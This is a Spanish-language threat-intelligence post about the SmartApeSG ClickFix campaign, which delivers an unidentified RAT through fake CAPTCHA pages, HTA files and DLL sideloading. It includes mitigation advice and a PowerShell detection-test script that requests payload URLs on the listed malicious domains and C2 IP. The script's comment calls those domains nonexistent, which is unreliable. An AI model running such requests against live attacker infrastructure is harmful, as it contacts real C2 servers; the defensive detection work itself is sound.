SOC Prime Bias: Alto

05 Aug 2026 07:42 UTC

SmartApeSG Distribuye un RAT Desconocido a Través de Señuelos ClickFix

Author Photo
SOC Prime Team linkedin icon Seguir
SmartApeSG Distribuye un RAT Desconocido a Través de Señuelos ClickFix
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumen

La campaña SmartApeSG utiliza la técnica ClickFix para engañar a los usuarios y hacerles ejecutar comandos maliciosos a través de páginas falsas de CAPTCHA o verificación humana. Esta acción lanza un archivo HTA que descarga y extrae un archivo ZIP malicioso. La carga final es un troyano de acceso remoto (RAT) no identificado que depende de la carga lateral de DLL para establecer persistencia y comunicarse con su infraestructura C2.

Investigación

La investigación incluyó el análisis de tráfico HTTPS, archivos PCAP y archivos maliciosos vinculados a la actividad de SmartApeSG. Los investigadores identificaron JavaScript malicioso inyectado en sitios web legítimos y rastrearon la cadena de infección desde un comando inyectado en el portapapeles hasta la conexión final con el C2. Se observó que el RAT se comunicaba con una dirección IP externa a través del puerto 443 utilizando tráfico cifrado.

Mitigación

Las organizaciones deben usar el filtrado web para bloquear dominios maliciosos conocidos, incluyendo pewtercanto[.]top and deltaode[.]com. Los usuarios deben ser entrenados para reconocer métodos de ingeniería social como CAPTCHAs falsos e instrucciones ClickFix. Restringir la ejecución de archivos HTA y monitorear procesos secundarios sospechosos lanzados por navegadores o comandos Run puede reducir aún más el riesgo.

Respuesta

Si se detecta actividad de SmartApeSG, el punto final afectado debe ser aislado inmediatamente para interrumpir la comunicación con el C2. Los investigadores deben examinar los directorios AppData y Documentos para identificar el RAT y sus mecanismos de persistencia. También se debe revisar la telemetría de los puntos finales en busca de ejecución no autorizada de HTA, manipulación del portapapeles y actividad de carga lateral de DLL.

Flujo de Ataque

Ejecución de Simulación

Prerequisito: La Verificación Pre-vuelo de Telemetría y Línea Base debe haber sido aprobada.

Razonamiento: Esta sección detalla la ejecución precisa de la técnica del adversario (TTP) diseñada para activar la regla de detección. Los comandos y la narrativa DEBEN reflejar directamente los TTPs identificados y apuntar a generar la telemetría exacta esperada por la lógica de detección. Ejemplos abstractos o no relacionados llevarán a un diagnóstico incorrecto.

  • Narrativa del Ataque y Comandos: El adversario está ejecutando la campaña ClickFix de SmartApeSG. Después de que un usuario es engañado para realizar una acción maliciosa (a menudo una actualización falsa del navegador), el sistema intenta descargar un archivo HTA malicioso. Luego, el HTA inicia una conexión con la infraestructura C2 para descargar la carga final del RAT. Para simular esto, generaremos solicitudes de red que contengan las cadenas exactas definidas en la lógica de detección: deltaode.compo, deltaode.com/wv, y la IP 89.124.79.98.

  • Guion de Prueba de Regresión:

     # Guion de simulación para activar la regla de detección de SmartApeSG
      # Este guion simula las solicitudes de red a los IoCs específicos
    
      $urls = @(
          "https://deltaode.compo/payload.hta",
          "https://deltaode.com/wv/malicious.exe",
          "http://89.124.79.98:443/c2_checkin"
      )
    
      foreach ($url in $urls) {
          Write-Host "Simulando solicitud a: $url"
          try {
              # Usando Invoke-WebRequest para generar la telemetria de red
              # Utilizamos -ErrorAction SilentlyContinue porque estos dominios no existen realmente
              Invoke-WebRequest -Uri $url -UseBasicParsing -ErrorAction SilentlyContinue
          } catch {
              Write-Host "Solicitud fallida (esperado), pero la telemetría debería generarse."
          }
      }
  • Comandos de Limpieza:

     # No se hicieron cambios permanentes en el sistema; no se requiere limpieza.
      Write-Host "Simulación completa. No quedan artefactos en el sistema."